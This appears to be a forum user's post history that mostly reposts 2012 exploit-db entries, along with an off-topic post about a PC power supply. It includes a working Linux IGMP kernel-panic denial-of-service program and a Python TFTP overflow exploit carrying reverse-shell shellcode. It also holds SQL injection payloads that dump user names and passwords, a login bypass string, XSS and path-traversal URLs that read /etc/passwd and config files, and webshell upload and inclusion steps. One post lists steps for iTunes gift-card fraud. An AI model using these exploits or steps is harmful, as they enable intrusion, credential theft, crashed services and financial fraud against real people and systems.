The_Arhitect
-
Posts
425 -
Joined
-
Last visited
-
Days Won
2
Posts posted by The_Arhitect
-
-
Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** written By Kingcope
** Year 2012
** Ripped & modified code written by Firestorm
** Tested against * OpenSuSE 11.4 system
** * Recent Ubuntu Distro
**
** Example:
** ./undeadattack 192.168.2.16 192.168.2.3
** The Linux Kernel at the remote side will Panic
** when sent over the network :>
** ENJOY!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
struct iphdr
{
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
unsigned int options1;
unsigned int options2;
};
struct igmp_query {
unsigned char type;
unsigned char maxresponse;
unsigned short csum;
unsigned int mcast;
char padding[40];
};
unsigned short in_chksum(unsigned short *, int);
long resolve(char *);
long resolve(char *host)
{
struct hostent *hst;
long addr;
hst = gethostbyname(host);
if (hst == NULL)
return(-1);
memcpy(&addr, hst->h_addr, hst->h_length);
return(addr);
}
int main(int argc, char *argv[])
{
struct sockaddr_in dst;
struct iphdr *ip;
struct igmp_query *igmp;
long daddr, saddr;
int s, i=0, c, len, one=1;
char buf[1500];
if (argc < 3)
{
printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
"credits to Ben Hutchings\nwritten by Kingcope\n"
"Ripped & modified code written by Firestorm\n");
printf("Usage: %s <src> <dst>\n", *argv);
return(1);
}
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);
memset(buf, 0, 1500);
ip = (struct iphdr *)&buf;
igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
ip->ihl = 7;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr)+8);
ip->id = htons(18277);
ip->frag_off=0;
ip->ttl = 1;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
ip->saddr = saddr;
ip->daddr = daddr;
ip->options1 = 0;
ip->options2 = 0;
igmp->type = 0x11;
igmp->maxresponse = 0xff;
igmp->mcast=inet_addr("224.0.0.1");
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 8);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1)
{
perror("Error sending packet");
exit(-1);
}
close(s);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
ip->id = htons(18278);
ip->tot_len = sizeof(struct iphdr)+12;
igmp->type = 0x11;
igmp->maxresponse = 0;
igmp->mcast=inet_addr("0.0.0.0");
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 12);
printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1)
{
perror("Error sending packet");
exit(-1);
}
return(0);
}
unsigned short in_chksum(unsigned short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}Sursa: Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
-
1
-
-
Joomla Discussions Component (com_discussions) SQL Injection
#
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 17/01/2012
# Risk : High
# Software : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://server/index.php?option=com_discussions&view=thread&catid=[SQLi]
#
# Example :
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [Get Tables Name]
# http://server/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
# 3. [Get Username]
# http://server/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
# 4. [Get Password]
# http://server/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
#Sursa: Joomla Discussions Component (com_discussions) SQL Injection
-
-
Cloupia End-to-end FlexPod Management Directory Traversal
*Cloupia End-to-end FlexPod Management - Directory Traversal Vulnerability***
*Advisory Information*
Advisory ID: KUSTODIAN-2011-011
Date published: Jan 13, 2011
*Vulnerability Information*
Class: Directory Traversal
Remotely Exploitable: Yes
Locally Exploitable: Yes
*Software Description*
Provides end-to-end FlexPod management and automation across physical,
virtual, compute, storage and network resources.
Create internal private clouds rapidly with internal standards and
procedures to maximize the infrastructure investments.
Provides comprehensive physical and virtual infrastructure management and
automation.
Provides unified solution and single pane of glass for consistent and
connected experience across private, public & hybrid clouds.
*Vulnerability Description*
jQuery File Tree is a configurable, AJAX file browser plugin for the jQuery
javascript library utilised within the Cloupia application framework.
Unauthenticated access to this module allows a remote attacker to browse
the entire file system of the host server, beyond the realm of the web
service itself.
Cloupia are aware of this flaw and are releasing a patch to mitigate
access. End users are urged to update immediately by contacting the vendor.
http://www.cloupia.com
* **Technical Description*
The following process performed as an attacker to exploit this
vulnerability would be as follows:
The code for the jQuery File Tree Java-Server-Page file reads as follows:
<%@ page
import="java.io.File,java.io.FilenameFilter,java.util.Arrays"%>
<%
/**
* jQuery File Tree JSP Connector
* Version 1.0
* Copyright 2008 Joshua Gould
* 21 April 2008
*/
String dir = request.getParameter("dir");
if (dir == null) {
return;
}
if (dir.charAt(dir.length()-1) == '\\') {
dir = dir.substring(0, dir.length()-1) + "/";
} else if (dir.charAt(dir.length()-1) != '/') {
dir += "/";
}
if (new File(dir).exists()) {
String[] files = new File(dir).list(new FilenameFilter() {
public boolean accept(File dir, String name) {
return name.charAt(0) != '.';
}
});
Arrays.sort(files, String.CASE_INSENSITIVE_ORDER);
out.print("<ul class=\"jqueryFileTree\" style=\"display:
none;\">");
// All dirs
for (String file : files) {
if (new File(dir, file).isDirectory()) {
out.print("<li class=\"directory
collapsed\"><a href=\"#\" rel=\"" + dir + file + "/\">"
+ file + "</a></li>");
}
}
// All files
for (String file : files) {
if (!new File(dir, file).isDirectory()) {
int dotIndex = file.lastIndexOf('.');
String ext = dotIndex > 0 ?
file.substring(dotIndex + 1) : "";
out.print("<li class=\"file ext_" + ext +
"\"><a href=\"#\" rel=\"" + dir + file + "\">"
+ file + "</a></li>");
}
}
out.print("</ul>");
}
%>
*Credits*
This vulnerability was discovered by Chris Rock <team@kustodian.com> and
from Kustodian www.Kustodian.com.
*Disclaimer*
The contents of this advisory are copyright (c) Kustodian Security and may
be distributed freely provided that no fee is charged for this distribution
and proper credit is given.Sursa: Cloupia End-to-end FlexPod Management Directory Traversal
-
PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities
Title = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author = Or4nG.M4n
Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar
This Bug Powered By : GooGLe
Thnks :
+----------------------------------+
| xSs m4n i-Hmx Cyber-Crystal |
| Dr.Bnned ahwak2000 sa^Dev!L |
+----------------------------------+
SQL Auth Bypass
vuln : class_AjaxLogin.php line 73
function is_login() { <<<<==== 1
include ('../config.php'); <<<<==== 2
if(isset($_POST['username'])) { <<<<==== 3
$_SESSION['username'] = $_POST['username']; <<<<==== 4
$password = $_POST['password']; <<<<==== 5
$strSQL = <<<<==== 6
"SELECT
*
FROM
`".$_SQL_PREFIX . $USER_Table_Name."`
WHERE
`LOGIN_NAME` = '".$_SESSION['username']."'
AND
password = md5('".$password."');"; <<<<==== 7
$result = mysql_query ($strSQL); <<<<==== 8
$row = mysql_fetch_row($result); <<<<==== 9
$exist = count($row); <<<<==== 10
if($exist >=2) { $this->jscript_location(); } <<<<==== 11
[jscript_location]
function jscript_location() { <<<<==== 12
$this->set_session(); <<<<==== 13
echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14
How i can Exploit this bug :
just login as = > admin ' or 1=1 #
SQL injection
vuln
admin/index.php line 212
$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
$getpack = mysql_query($sql); <<<<==== 2
line 1079
showPacket($pid); <<<<==== 3
vuln
index.php line 617
$SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1
$result = mysql_query($SQL); <<<<==== 2
Exploit Here :
index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie
Cross Site Scrpting [xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>Sursa: PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities
-
"Eroare"
-
Step Number 1:
Sign up for an iTunes account.
Step Number 2:
Make sure your balance is $0.00 or anything below $1.00
Step Number 3:
Add the Prepaid Credit Card Gift Card to your iTunes account.
Step Number 4:
Purchase as many Albums, Songs, Apps, iBooks, Movies, Shows. Make sure to time the downloads, make sure 1 download is done before you download
another (or else the card gets locked).
-
==========================================
# Exploit Title: pragyan 2.6.1 Upload File
# Author: Dr.KroOoZ
# Software : http://ignum.dl.sourceforge.net/project/pragyan/pragyan/2.6.1/pragyan-2.6.1.tar.gz
# Tested on: || Linux || Windows ||
# Dork :
==========================================
===[ Exploit ]===
http://localhost/Path/cms/modules/article/fckEditor/editor/filemanager/browser/default/frmupload.html
Then Upload Shell xD
==========================================
Homepage : www.ttgsa.com
==========================================
[»] Greetz to:
[ ZGaRT NeT & R.B.G HackEr & No-QRQR & Mr.Abu.Z7Z7 & New KilleR & FoX HaCkeR & Mr.DH & HaNiBaL KsA ]source: exploit-db.com
-
Title:
======
Tine v2.0 Maischa - Cross Site Scripting Vulnerability
Date:
=====
2012-01-12
References:
===========http://www.vulnerability-lab.com/get_content.php?id=379
VL-ID:
=====
379
Introduction:
=============
Tine 2.0 is an open source project which combines groupware and CRM in
one consistent interface. Tine 2.0 is web-based
and optimises collaboration and organisation of groups in a lasting
manner. Tine 2.0 unites all the advantages of open
source software with an extraordinarily high level of usability and an
equally high standard of professional software
development. This is what makes the difference between Tine 2.0 and
many other existing groupware solutions.
Tine 2.0 includes address book, calendar, email, tasks, time tracking
and CRM. Intelligent functions and links make
collaboration in Tine 2.0 a true pleasure and include:
Synchronising mobile telephones, such as iPhone, Android, Nokia
and Windows Mobile
VoiP integration
Flexible assigning of authorisation rights
Dynamic lists
Search functions
History
PDF export
(Copy from the Vendor Homepage: http://www.tine20.org/)
Abstract:
=========
Vulnerability-Lab Team Researcher discovered multiple persistent Web
Vulnerabilities on the Tine v2.0 Content Management System.
Report-Timeline:
================
2011-12-01: Vendor Notification
2012-01-12: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
MetaWays
Product: Tine CMS v2.0
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple input validation vulnerabilities(persistent) are detected on
Tine v2.0 Content Management System. Local attackers
can include (persistent) malicious script code to manipulate specific
user/admin requests. The vulnerability allows an
local privileged attacker to manipulate the appliance(application)
via persistent script code inject. Successful exploitation
can result in session hijacking or persistent context manipulation on requests.
Vulnerable Module(s):
[+] New Contacts - Input & Output
[+] Lead Name - Input & Output
Picture(s):
../1.png
../2.png
../3.png
Risk:
=====
The security risk of the persistent software vulnerability is
estimated as medium(-).
Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)
Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of
merchantability and capability for a particular purpose.
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially
usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its
unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright 2012|Vulnerability-Labsource: exploit-db.com
-
######################################################
# Exploit Title: WordPress wp-autoyoutube plugin Blind SQL Injection
Vulnerability
# Date: 2012-11-01
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/wp-autoyoutube/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in wp-autoyoutube, Wordpress Plugin,
vulnerability is Blind SQL injection.
File:wp-content/plugins/wp-autoyoutube/modules/index.php
Exploit: id=-1; or 1=if
*Exploitation*http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE
WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6)source: exploit-db.com
-
# Exploit Title: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Software Link: http://yabsoft.com/
# Tested on: [Linux/Windows 7]
#Vulnerable File:
view_comments.php
#Vulnerable parameter:
view_comments.php?gal=[gallery id]
##############################################################
PoC:
www.example.com/view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users--
##############################################################
www.areyousecure.net
www.websiteauditing.org
# Shouts to the Belegit crewsource: exploit-db.com
-
-
Title
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2
vuln
download.lib.php line 16
vuln
index.php line 234
$_GET['fileget']
exploit http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../ etc/passwd . boot.ini
Download Config file
exploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.phpsource: exploit-db.com
-
# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in www.root-team.com www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
W-CMS cross site scripting
_______________
Vulnerable Link __________\/_____________________
_______________
http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"
http://localhost/?p=3<FORM action="Default.asp?PageId=-1"
method=POST id=searchFORMname=searchFORM
style="margin:0;padding:0"><INPUT type="hidden" value=""
name="txtSEARCH"></FORM>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks
This script is possibly vulnerable to directory traversal attacks
http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.netsource: exploit-db.com
-
# Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
1) Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
The rendered page will provide a link to http://www.evil.com
2) Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
redirect_to: http://www.evil.com
age_day: 1
age_month: 1
age_year: 1970
Direct redirect to http://www.evil.comsource: exploit-db.com
-
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise... #
# #
# This tftp service have been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/5314/ #
# (2) Molotov ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/10542/ #
# (3) tixxDZ ==> ERROR Overflow #
# http://www.exploit-db.com/exploits/5563/ #
# #
# Vulnerable software: #
# http://www.exploit-db.com/application/5314/ #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read #
# Request (RRQ) packet can also trigger a buffer overflow... #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear #
# as expected.... #
# #
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:\Program Files\TFTPServer> #
#---------------------------------------------------------------------------#
import socket
import sys
host = '192.168.111.128'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00'
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
shell = (
"\xbb\x3c\xef\xdb\xc5\xdb\xdd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\xde\x1a\x27\x2d\x97"
"\xe5\xd8\xae\xc7\x6c\x3d\x9f\xd5\x0b\x35\xb2\xe9\x58\x1b\x3f"
"\x82\x0d\x88\xb4\xe6\x99\xbf\x7d\x4c\xfc\x8e\x7e\x61\xc0\x5d"
"\xbc\xe0\xbc\x9f\x91\xc2\xfd\x6f\xe4\x03\x39\x8d\x07\x51\x92"
"\xd9\xba\x45\x97\x9c\x06\x64\x77\xab\x37\x1e\xf2\x6c\xc3\x94"
"\xfd\xbc\x7c\xa3\xb6\x24\xf6\xeb\x66\x54\xdb\xe8\x5b\x1f\x50"
"\xda\x28\x9e\xb0\x13\xd0\x90\xfc\xff\xef\x1c\xf1\xfe\x28\x9a"
"\xea\x75\x43\xd8\x97\x8d\x90\xa2\x43\x18\x05\x04\x07\xba\xed"
"\xb4\xc4\x5c\x65\xba\xa1\x2b\x21\xdf\x34\xf8\x59\xdb\xbd\xff"
"\x8d\x6d\x85\xdb\x09\x35\x5d\x42\x0b\x93\x30\x7b\x4b\x7b\xec"
"\xd9\x07\x6e\xf9\x5b\x4a\xe7\xce\x51\x75\xf7\x58\xe2\x06\xc5"
"\xc7\x58\x81\x65\x8f\x46\x56\x89\xba\x3e\xc8\x74\x45\x3e\xc0"
"\xb2\x11\x6e\x7a\x12\x1a\xe5\x7a\x9b\xcf\xa9\x2a\x33\xa0\x09"
"\x9b\xf3\x10\xe1\xf1\xfb\x4f\x11\xfa\xd1\xf9\x16\x6d\x1a\x51"
"\xf7\xea\xf2\xa0\x07\xd4\x06\x2c\xe1\x70\x17\x78\xba\xec\x8e"
"\x21\x30\x8c\x4f\xfc\xd0\x2d\xdd\x9b\x20\x3b\xfe\x33\x77\x6c"
"\x30\x4a\x1d\x80\x6b\xe4\x03\x59\xed\xcf\x87\x86\xce\xce\x06"
"\x4a\x6a\xf5\x18\x92\x73\xb1\x4c\x4a\x22\x6f\x3a\x2c\x9c\xc1"
"\x94\xe6\x73\x88\x70\x7e\xb8\x0b\x06\x7f\x95\xfd\xe6\xce\x40"
"\xb8\x19\xfe\x04\x4c\x62\xe2\xb4\xb3\xb9\xa6\xc5\xf9\xe3\x8f"
"\x4d\xa4\x76\x92\x13\x57\xad\xd1\x2d\xd4\x47\xaa\xc9\xc4\x22"
"\xaf\x96\x42\xdf\xdd\x87\x26\xdf\x72\xa7\x62")
#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR #
# => 3-byte overwrite using the mandatory protocol null-byte. #
# (2) Stage2: jump back 5-bytes "\xEB\xF9" so we have room for a far jump. #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer. #
# (4) Stage4: reverse shell port 9988 - size 341 #
#---------------------------------------------------------------------------#
stage4 = "\x90"*50 + shell
stage3 = "\xE9\x2E\xFA\xFF\xFF"
stage2 = "\xEB\xF9\x90\x90"
stage1 = "\x05\x96\x40"
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
mode = "netascii"
youlose = "\x00\x01" + filename + "\x00" + mode + "\x00"
s.sendto(youlose, (host, port))source: exploit-db.com
-
Cu p*la nu merge controlat?
)) -
# Exploit Title: razorCMS 1.2 Path Traversal
# Google Dork: "Powered by razorCMS"
# Date: January 10, 2012
# Author: chap0
# Software Link: http://www.razorcms.co.uk/archive/core/
# Version: 1.2
# Tested on: Ubuntu
# Patch: Upgrade to latest release 1.2.1
# Greetz To: <Insert Name Here>
RazorCMS is vulnerable to Path Traversal, when logged in with
a least privileged user account the user can access the
administrator's and super administrator's directories and
files by changing the path in the url. The vulnerabilities exist
in admin_func.php
Patch Time line:
Dec 11, 2011 - Contacted Vendor
Dec 11, 2011 - Vendor Replied ask for details of vulnerability
Dec 12, 2011 - Submitted details
Dec 13, 2011 - No reply asked for an update
Dec 13, 2011 - Vendor Replied asking for a week or two for a fix after the holiday period
Dec 20, 2011 - Emailed Vendor for an update
Dec 21, 2011 - Vendor confirmed vulnerabilities asked for two weeks time for a fix
Dec 27, 2011 - Emailed vendor some "temp fixes" for the vulnerabilities discovered
Jan 3, 2012 - Emailed vendor more "temp fixes"
Jan 5, 2012 - Vendor replied sent a new updated file v1 admin_func.php
Jan 5, 2012 - Replied to vendor discovered more vulnerabilities
Jan 6, 2012 - Vendor response with new file with fixes v2 admin_func.php
Jan 6, 2012 - Tested discovered more vulnerabilities
Jan 8, 2012 - Vendor replied with new file v3 admin_func.php
Jan 8, 2012 - Tested, vulnerabilities are fixed reported to vendor
Jan 9, 2012 - Vendor released update 1.2.1
Jan 10, 2012 - Public Disclosure
Path Traversal Details:
The following files and directories are vulnerable to Path Traversal
Attack including any files or directories that the admin or super admin
may create within these directories
http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/
http://razorcms-server/admin/?action=filemanview&dir=backup/
http://razorcms-server/admin/?action=filemanview&dir=/razor_data.txt
http://razorcms-server/admin/?action=filemanview&dir=/index.htm
http://razorcms-server/admin/?action=fileman&dir=razor_temp_logs/
http://razorcms-server/admin/?action=fileman&dir=backup/
http://razorcms-server/admin/?action=fileman&dir=/razor_data.txt
http://razorcms-server/admin/?action=fileman&dir=/index.htm
An example would be if the super admin created a directory within razor_temp_logs
named sekrit which should not be accessible with a least privileged user, the
least privileged user can change the path as shown below:
http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/
Which also works on files within those directories which the user should not have
access to which at this point gives the user access to view, edit, rename, move,
copy and delete the file.
e.g.
http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt
Another vulnerability exist in this version of razorCMS, if a least privileged user creates
a directory with their logged in credentials, and then deletes the directory, the user will
then have access to the administrative directories and files.source: exploit-db.com
-
Am avut o sursa buna iar un ventilator prost la acea sursa...cum vedeti ca numai functioneaza o scoate`ti si numai ii dati start la calculator pana nu luati una noua...asa ar trebuii fiiindca mai bine dati 60 lei pe una noua decat sa luati ventilator care face 20lei +30 lei ca iti cere pentru a ti`l pune.
Problema este urmatoarea...o scoate`ti etc.. fiindca vi se vor arde si alte parti din calculator..din cauza cand dati start face scurt-circuit fiindca ventilatorul de la sursa nu porneste.
Eu chiar azi am patit asa ceva
Am schimbat placa de baza...placa video..rami.. fiindca mi s`a ars placa de baza...Ce dracu ai ma in capu ala cacat?
-
#!/usr/bin/python
# Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability
# Version: 1.1.73.2
# Date: 2012-01-08
# Author: Julien Ahrens
# Homepage: www.inshell.net
# Software Link: http://www.geopainting.com
# Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit German
file="GPSMapEdit_crash.lst"
junk="\x41"*512
print "[*] Creating crash file...\n";
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n";source: exploit-db.com
-
# Exploit : Multiple Vulnerability on ClipBucket 2.6
# Date : 09 January 2012
# Author : YaDoY666
# Website : http://yadoy666.serverisdown.org
# Software : Clip Bucket (Open Source Video Sharing)
# Version : 2.6
# Vendor : Clip Bucket (http://clip-bucket.com)
# Vendor Response : None
Cross Site Scripting
====================
[[=]] http://[site]/[path]/channels.php
[[=]] http://[site]/[path]/collections.php
[[=]] http://[site]/[path]/groups.php
[[=]] http://[site]/[path]/search_result.php
[[=]] http://[site]/[path]/videos.php
[[=]] http://[site]/[path]/view_collection.php
[[=]] http://[site]/[path]/view_item.php
Example :
http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
http://[site]/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
http://[site]/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
SQL Injection
==============
[[=]] http://[site]/[path]/channels.php
[[=]] http://[site]/[path]/videos.php
Example :
http://[site]/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
http://[site]/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
Greets : KombezNux | Jack | X-Shadow | Don Tukulesto | GBlack | elv1n4 | GBlack | Kamtiez | n4ck0 | AaEzha | ServerIsDown | Indonesian Coder |source: exploit-db.com
-
# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2
@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]
Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.
Special thanks for Dan Pemulasource: exploit-db.com
-
#!/usr/bin/python
#
# Note from the Exploit-DB team: This might be the same bug as:
